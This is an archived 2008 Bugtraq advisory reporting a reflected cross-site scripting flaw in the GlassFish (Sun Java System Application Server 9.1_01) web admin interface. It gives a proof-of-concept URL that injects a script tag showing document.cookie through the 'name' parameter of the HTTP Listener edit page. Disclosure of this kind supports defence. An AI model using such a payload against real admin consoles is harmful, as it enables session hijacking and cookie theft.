| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 10 Jun 2008 15:12:08 -0300 From: "Eduardo Jorge" <serrano.neves@...il.com> To: bugtraq@...urityfocus.com Subject: XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) ) ============================== XSS - Glassfish Web Admin Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) ) ============================== Author: Eduardo Neves a.k.a _eth0_ Date: 10 june 2008 Site: http://webappsecurity.wordpress.com ============================== APPLICATION : Glassfish webadmin interface VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs) VENDOR : http://www.sun.com DOWNLOAD : https://glassfish.dev.java.net/ ============================== IMPACT: XSS, XSRF, etc. Severity: Low (or not?) ============================== Descrition: This vulnerability was found in Edit HTTP Listener section in Glassfish web admin interface. This is a vulnerable URL: http://[HOSTNAME]:4848/configuration/httpListenerEdit.jsf?name=<script>alert(document.cookie);</script>&configName=server-config -- |_|0|_| Serrano Neves - a.k.a eth0 |_|_|0| http://webappsecurity.wordpress.com |0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds
Powered by blists - more mailing lists